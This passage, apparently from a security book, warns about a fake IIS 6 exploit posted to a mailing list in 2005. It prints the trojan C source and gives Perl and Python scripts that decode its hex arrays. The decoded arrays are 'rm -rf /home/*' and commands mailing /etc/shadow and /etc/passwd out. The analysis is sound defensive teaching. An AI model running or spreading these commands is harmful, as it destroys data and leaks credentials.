Warning

Take heed of this warning. In the underground world of information warfare there are very few rules. Ultimately you are responsible for your own actions and for your own protection, so once you step into this arena you had better arm yourself with knowledge. There are people out there who prey on the uninformed and try to trick others into taking unwanted actions on their own systems. Here is an example, so you can consider yourself warned.

In April 2005, someone posted an "exploit" entitled "IIS 6 Remote Buffer Overflow Exploit" to the Full-Disclosure mailing list. As of the writing of this book, it is still visible at http://seclists.org/lists/fulldisclosure/2005/Apr/0412.html. To the naked eye it looked like the legitimate discovery of an IIS 6 exploit. Take a look at the posted source code:


/* Proof of concept code
   Please don't send us e-mails
   asking us "how to hack" because
   we will be forced to skullfsck you.

DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

   IIS 6 Buffer Overflow Exploit

   BUG: inetinfo.exe improperly bound checks
   http requests sent longer than 6998 chars.
   Can get messy but enough testing, and we have
   found a way in.

   VENDOR STATUS: Notified
   FIX: In process

   Remote root.

   eg.
   #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
    + Connecting to host...
    + Connected.
    + Inserting Shellcode...
    + Done...
    + Spawining shell..

    Microsoft Windows XP [Version 5.1.2600]
   (C) Copyright 1985-2001 Microsoft Corp.
   C:\>

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

main()
{

//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);

//int socket = 0;
//double long port = 0.0;

//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE

 // for(int j; j < 30; j++)
        {
        //Find socket remote address fault
        printf(".");
        }
//overtake inetinfo here IIS_666666^
return 0;
}

Many things should have triggered your suspicions about this source code. I will not list them all here, but a working knowledge of C is necessary to spot them (one that needs no C at all: the sample output shows a Windows XP banner, yet IIS 6 shipped with Windows Server 2003). To appreciate the severity of what would have happened had this code been carelessly downloaded, compiled and run, notice that the only statements that actually execute are three calls to system(); nearly everything else, including the socket handling any remote exploit would need, is commented out. system() hands its argument to the local /bin/sh, so whatever those "shellcode" arrays contain runs as shell commands on your computer, not as machine code on the target. You need to convert the \xXX hex back to printable ASCII and look at what the system() calls would try to do. The following very basic Perl script will help you out:


#!/usr/bin/perl -w
#
# This script provides very basic functionality for
# converting \xXX hex to ASCII and vice versa.
# It expects the input to be converted to be in a file.
#
# File:   hex2ascii.pl
# Author: Andres Andreu <andres [at] neurofuzz dot com>
#

use strict;
use Getopt::Std;

# Parse the command line: -f <file> is required, -x or -a picks the direction
my %opts = ();
getopts("f:xa", \%opts);

my $infile    = $opts{f};
my $gen_hex   = $opts{a};   # ASCII -> \xXX
my $gen_ascii = $opts{x};   # \xXX -> ASCII
my $hex       = '';         # accumulated input, C source decoration removed

# Usage statement
sub usage {
   print "$0 -f <file> [-x | -a] \n\t";
   print '-f <path to input file>'."\n\t";
   print '-x convert "\xXX" hex to readable ascii'."\n\t";
   print '-a convert ascii to "\xXX" hex'."\n\t";
   print "\n";
   exit;
}

# Need an input file and at least one direction
usage() if !$infile || (!$gen_hex && !$gen_ascii);

# Read the file, stripping the line endings, tabs and double quotes that
# decorate each line of a C char[] initializer
open(my $in, '<', $infile) or die "Error opening '$infile': $!\n";
while (my $line = <$in>) {
   $line =~ s/[\r\n\t"]//g;
   $hex .= $line;
}
close($in);

if ($gen_ascii) {
   # \xXX hex style to ASCII
   $hex =~ s/\\x([a-fA-F0-9]{2})/chr(hex($1))/eg;
} elsif ($gen_hex) {
   # ASCII to \xXX hex, every character including spaces and punctuation
   $hex =~ s/(.)/sprintf("\\x%02X", ord($1))/egs;
}

print "\n$hex\n";

Take each array from the C source code and save its string content to a file named after the array with a .txt extension, so the content of char shellcode[] goes into shellcode.txt, and so on. Pass each file in with the -f switch, and take a disturbing look:

perl hex2ascii.pl -f shellcode.txt -x

/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe

perl hex2ascii.pl -f launcher.txt -x

cat /etc/shadow |mail full-disclosure@lists.grok.org.uk ;

perl hex2ascii.pl -f netcat_shell.txt -x

cat /etc/passwd |mail full-disclosure@lists.grok.org.uk ;

As you can clearly see, you could have ended up in an unpleasant situation had you simply taken this source, compiled it, and run the result. Because system() runs each string through /bin/sh with the privileges of whoever launched the binary, mailing /etc/shadow to the embedded address would only succeed if you ran it as root, but /etc/passwd is world-readable on most systems, and rm -rf /home/* would at the very least wipe out your own home directory.
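The same check can be automated against the source file itself rather than by hand-copying each array. The script below is an added example written for this edition, not code from the book or from the Full-Disclosure post: it pulls every char[] initializer out of a C file, decodes the \xHH escapes, strips comments to find which arrays are actually handed to system() by live code, and classifies each payload as binary (what genuine machine-code shellcode looks like) or as printable text with shell syntax. The embedded input is constructed from the arrays and statements in the posted source above, plus one extra array, real_shellcode, that I made up from the opening bytes of a typical x86 Linux execve shellcode so the contrast is visible.

```python
import re
import string

# Constructed input, embedded so this runs offline: the char arrays and live
# statements from the posted "IIS 6" source, plus real_shellcode, an array I
# added for contrast (opening bytes of a typical x86 Linux execve shellcode).
POSTED_SOURCE = r'''
/* Proof of concept code: IIS 6 Buffer Overflow Exploit */
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char real_shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68";

main()
{
system(launcher);
system(netcat_shell);
system(shellcode);
//overtake inetinfo here IIS_666666^
return 0;
}
'''

C_ESCAPES = {"n": b"\n", "t": b"\t", "r": b"\r", "0": b"\x00", "\\": b"\\", '"': b'"', "'": b"'"}

def decode_c_literal(body):
    """Turn the text between the quotes of a C string literal into the
    bytes the compiler would emit (handles \\xHH and the common escapes)."""
    out, i = bytearray(), 0
    while i < len(body):
        if body[i] != "\\":
            out.append(ord(body[i]))
            i += 1
        elif body[i + 1] == "x":
            digits = re.match(r"[0-9a-fA-F]{1,2}", body[i + 2:]).group(0)
            out.append(int(digits, 16))
            i += 2 + len(digits)
        else:
            out += C_ESCAPES.get(body[i + 1], body[i + 1].encode())
            i += 2
    return bytes(out)

# char <name>[] = "..." "..." ...;  (adjacent literals are concatenated by C)
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')

def extract_char_arrays(src):
    """Return {name: bytes} for every char array initializer in src."""
    arrays = {}
    for name, literals in ARRAY_RE.findall(src):
        pieces = re.findall(r'"((?:[^"\\]|\\.)*)"', literals)
        arrays[name] = b"".join(decode_c_literal(p) for p in pieces)
    return arrays

def strip_comments(src):
    """Drop /* */ and // comments (naive: ignores markers inside string literals)."""
    src = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    return re.sub(r"//[^\n]*", "", src)

def live_system_args(src):
    """Names of the arrays handed to system() by code that is not commented out."""
    return re.findall(r"\bsystem\s*\(\s*(\w+)\s*\)", strip_comments(src))

PRINTABLE = set(string.printable.encode())
SHELL_META = set(b";|&$`>< ")

def classify(data):
    """'binary' if any byte is non-printable (what real machine code looks like),
    'shell' if it is all text and carries shell syntax, else 'text'."""
    if any(b not in PRINTABLE for b in data):
        return "binary"
    if data.startswith(b"/") or any(b in SHELL_META for b in data):
        return "shell"
    return "text"

def triage(src):
    """For each array: what it decodes to, what it looks like, and whether
    the live code would actually pass it to system()."""
    executed = set(live_system_args(src))
    return {name: {"decoded": data.decode("latin-1"),
                   "kind": classify(data),
                   "passed_to_system": name in executed}
            for name, data in extract_char_arrays(src).items()}

if __name__ == "__main__":
    for name, info in triage(POSTED_SOURCE).items():
        mark = "!!" if info["kind"] == "shell" and info["passed_to_system"] else "  "
        print(mark, name, info["kind"], repr(info["decoded"]))
```

Run it against any suspect .c file by replacing POSTED_SOURCE with the file's contents. The three posted arrays decode to printable shell commands and are all reached by live system() calls, which is the combination to treat as hostile; the contrast array decodes to non-printable bytes, which is what you would expect a payload for a real memory-corruption exploit to look like. The comment stripper is deliberately simple, so a posting that hides comment markers inside string literals can confuse it; the decoded strings are still worth reading by eye.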
